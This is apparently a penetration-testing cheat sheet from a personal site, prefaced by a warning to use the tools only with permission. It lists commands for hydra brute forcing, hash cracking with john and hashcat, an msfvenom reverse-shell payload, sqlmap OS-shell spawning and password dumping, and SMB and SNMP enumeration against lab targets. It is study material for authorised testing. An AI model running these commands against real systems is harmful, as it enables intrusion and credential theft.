Command Line Tools

The following is a list of useful command line tools that I’ve begun to use for simple penetration testing. IMPORTANT: Please read the notes in italics below before proceeding.

Before using any of these tools you should ensure that you have explicit permission to do so. I ONLY use these tools on my own air gapped network or against challenge sites (such as Hack The Box) where I am an authorised user. Using these tools against targets for which you DO NOT have explicit permission almost certainly constitutes an offence under the Computer Misuse Act 1990 (UK) . There is simply no excuse for doing so when legitimate penetration testing and coding sites are available, many of which are free. Don’t waste your life and prospects on cyber crime – you will eventually make a mistake and get caught, no matter how good you think you are. Remember if you have services hosted by a third party then you DO NOT have explicit permission to use these tools against your services without the consent of the host.

Some people believe that these techniques should not be published as it makes things easier for wannabe cyber criminals. The fact is that unless there is a global initiative to censor such material from the internet, this is simply not practical. Nothing I have published below is a secret: all of these tools have been around for a while and searching for any one of them will return pages and pages of instruction. The legitimate purpose of these tools is to test systems for vulnerabilities so that they can be target hardened against criminals – and that is the context in which I produce them below. If you are concerned about the vulnerability of your systems to any of these tools, then you should consider employing a qualified penetration tester to provide you with an analysis and recommendations of how you can improve your security.

If you already know that you have vulnerabilities in your systems, you should fix those before employing a penetration tester. Most basic systems can be secured by good cyber awareness and discipline, patch management and up to date anti-malware suites.

ARP – Address Resolution Protocol

Maps IP addresses to MAC addresses

arp-scan

Identifies hosts on a network

arp-scan 192.168.3.0/24 192.168.45.0/24
#identifies hosts on the 192.168.3 and 192.168.45 ranges

Brute Force Tools

hydra

Versatile brute force tool for many services

hydra -l root -P /path/dictionary.txt mysql://192.168.3.100
#Brute force mysql user root on target using dictionary passwords

hydra -l postgres -P /path/dict.txt postgres://192.168.3.100
#Brute force postgres user on target for using passwords from dict.txt

hydra -l bob -P /path/dict.txt -s 22 192.168.3.100 -t4 ssh
#Brute force ssh service for user bob on port 22 using passwords from dict.txt

Directory/File Fuzzers

Tools for locating hidden/unknown files and directories

dirsearch

python3 dirsearch.py -u http://10.10.10.28 -e php
#Scans for common directory names

gobuster

gobuster dir -u http://10.10.10.29/ -w /usr/share/wordlists/dirb/common.txt
#scans target for directories in the wordlist common.txt

gobuster dir -u http://10.10.10.191 -w dir.txt -x txt -b 403,404 --wildcard
#scans target for directories and txt files using wildcard, excluding 403 and 404 http errors from output.

Hash Identification

hash-identifer

hash-identifier
#Prompts for hash then identifies possible algorithm
#Always internet search hashes before resorting to cracking

Password Cracking

Offline brute force tools and utilities

cewl

Spider that creates a wordlist based on a website

cewl -d 2 -m 5 -w wordlist.txt https://example.com
#generates wordlist.txt by spidering example.com to a depth of two minimum word length 5

hashcat

Offline hash cracking tool

hashcat -m0 -a0 hashlist.txt /path/dict.txt --quiet
#Use dict.txt to attack hashlist.txt (a0) as MD5 (m0) 
#Always internet search hashes before resorting to cracking

john

Versatile offline cracking tool

# john stores already cracked passwords. Use --show to display or --pot=file to override
#password_hashes in this instance is derived from unshadow
#hashes_win7 is a Windows hashdump (eg from Metasploit)

john --single password_hashes
#Mangles user data and compares hashes looking for matches

john -w=/path/dict.txt password_hashes
#Runs a dictionary attack against password_hashes using dict.txt

john --format=NT --wordlist=/path/dict.txt hashes_win7
#Runs a dictionary attack against Windows hashdump using dict.txt

#Always internet search hashes before resorting to cracking

unshadow

creates suitable john compatible files from Linux data

#Requires Linux /etc/passwd and /etc/shadow files

unshadow passwd shadow > password_hashes

#unshadows passwd/shadow files and provides list of hashes compatible with john

zip2john

extracts hashes from protected zip files

zip2john backup.zip > hash
#extracts password hash from password protected zip
#Always internet search hashes before resorting to cracking

Payload Generation

msfvenom

Companion payload generator for the Metasploit Framework

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o phone_home.php 

#Generates a php payload to call back to LHOST on port 4444 and spawn meterpreter shell
. Create listener in MSFConsole. Upload the payload to target, then navigate to the payload file in browser. 

Port Scanning

nmap

Highly versatile port scanning tool with added functionality in the form of the scripting engine, which additionally reports vulnerabilities.

nmap -sS -sV -nvv -O 192.168.3.0/24 -oA tcp_result
#perform 1/2 connect TCP scan; check service; 
DNS resolution OFF, verbosity medium; detect OS; on range 192.168.3.0;
 output in all 3 formats, file prefix tcp_result

nmap -sU -F -nvv 192.168.3.0/24 192.168.45.0 -oA udp_result
#UDP scan; Fast (top 100); medium verbosity; target ranges;
 output in all 3 formats, file prefix udp_result

nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//
#full scan, returns only open port numbers
. This is useful for Hack The Box when set to a variable which is rescanned, as the return is nicely formatted and uncluttered.

ports=$(above nmap command to return ports only)
nmap -sC -sV -p$ports 10.10.10.27 
#Scan focused on known open ports

grep --color 22/open/tcp *.gnmap
#search nmap results for open port 22 (SSH)

SNMP – Simple Network Management Protocol

• Default port – 161.
• Versions 1 and 2c offer no authentication or encryption.
• Default community strings: public, private

grep --color 161/open/udp *.gnmap
#Searches all gnmap files and highlights pattern 161/open/udp
#ie searches nmap scans for default SNMP ports

nmap scripting engine

nmap -sU -nvv -p161 --script snmp-brute 192.168.3.100 --script-args snmp-brute.communinitiesdb=/path/dictionary.txt
#run the snmp-brute script vs target using dictionary communities
#The results can be searched for useful information such as usernames

onesixtyone

Tool that can be used to brute force community strings.

onesixtyone -c /path/dictionary.txt 192.168.3.100
#Scan target for community strings found in dictionary file

snmpwalk

Enumerates snmp community strings.

snmpwalk -v 1 -c community 192.168.3.100
#use SNMP version1 and scan community named community on target

SQL – Structured Query Language

There are several deployments of SQL, such as MySQL, Postgresql and MSSQL each with different default ports and credentials.

mssqlclient.py

Used to establish remote connection to MSSQL server

mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
#establishes remote connection to MSSQL server where ARCHETYPE/sql_svc is the user

sqlmap

Tool for detecting vulnerability in sql deployments, and can be used to automate SQL Injection. Where the database is accessible in a web application, the Referrer URL and Cookie should be captured using Burp Suite or HTTP Tracker, eg:

Referer: http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit
Cookie: security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989

sqlmap -d postgres://user:password@192.168.3.100:5432/postgres --os-shell
#Use database postgres using the postgres service of user/password on port 5432 to spawn shell. (Credentialled)

sqlmap -u "http://10.10.10.46/dashboard.php?search=a" --cookie="PHPSESSID=cookie" --os-shell
#Attempts to brute force a shell

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -b --current-db --current-user
#Assesses vulnerability and provides current database name and user

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --string="Surname" --users --password
#Extracts database management system users and passwords (hashes)

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -U only_me --privileges
#List privileges of a specified database management system user (only_me)

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --dbs
#Obtain a list of all databases

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot --tables
#Obtain a list of tables in specified database (noobot)

sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users --columns
#Obtain list of columns in specified table (users) in specified database (noobot)

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users -C user,password --dump
#Dump contents of specified columns (user, password) from specified table (users) from specified database (noobot)

Web Ap Scanners

nikto

nikto -host http://192.168.56.101/noobot
#Provides scan that includes references to Open Source Vulnerability Database
 (OSVDB)

Windows Enumeration

• Default ports: 135 (RPC), 137 (NetBIOS Browser), 139 (NetBIOS (deprecated), 445 (SMB)
• RIDs: 500 (Administrator), 501 (Guest), 502 (Krbtgt (Kerberos)), 1000+ Users
• Common techniques for Windows enumeration are Null Session and RID recycling using enum4linux -r

enum4linux

Enumeration tool

enum4linux -a 192.168.3.11
#Can identify workgroups, domains (and controllers)

enum4linux -a -u user -p password -R 1100-1200 192.168.3.11
#Credentialled RID scan in range 1100-1200

net (credentialled Windows)

Display group membership information

net group "Domain Admins" /domain
#Identifies Domain Admin accounts

smbclient

SMB enumeration and share mounting

smbclient -N -L \\\\10.10.10.27\\
#List available shares (look for those which are not $)

smbclient -N \\\\10.10.10.27\\backups
#Attempts to connect to share "backups" - if successful results in smb prompt from which commands get AND dir work

WordPress

Popular site host; manual enumeration to recover /blog path and /readme.html which provides version.

wpscan

WordPress enumeration tool.

wpscan --url http://192.168.3.110/blog/
#Enumerates for Metasploit vulnerabilities